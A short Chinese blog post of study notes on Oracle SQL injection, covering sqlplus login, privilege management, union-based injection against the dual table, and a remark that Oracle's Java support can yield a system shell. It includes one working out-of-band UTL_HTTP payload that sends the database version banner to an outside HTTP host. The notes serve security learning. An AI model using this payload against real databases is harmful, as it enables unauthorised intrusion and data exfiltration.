DAY9：SQL注入8-Oracle

时间：2019-10-07 18:04:58 阅读：119 评论：0 收藏：0 [点我收藏+]

一、Oracle基本使用

1. 如何登陆Oracle

打开cmd输入sqlplus（windows server 2008）

用户名：system

密码：123456

2. 增删改查

二、Oracle权限控制

1. Oracle权限（重点）

2. 用户权限管理

以system账号登录默认DBA权限

3. 表权限管理

三、Oracle注入

1. union注入（判断回显点的时候要先确定数据类型，根据类型来union select，并且union语句也要from一个数据库，一般用dual测试，from dual）

https://cnblogs.com/peterpan0707007/p/8242119.html

https://blog.csdn.net/cclarence/article/details/49784595

2. 利用UTL_HTTP进行注入（常规注入是In Band，这里是OOB--Out Of Band），需要DBA的权限

and (UTL_HTTP.request(‘http://192.168.18.145/sql/Less-1/index.php?id=‘||(select banner from sys.v_$version where rownum=1)))<‘a‘--

3. 利用Oracle注入拿下系统shell（待测试）

原理：Oracle数据库可以利用java代码执行命令

原文地址：https://www.cnblogs.com/niangaoSDS/p/11631233.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行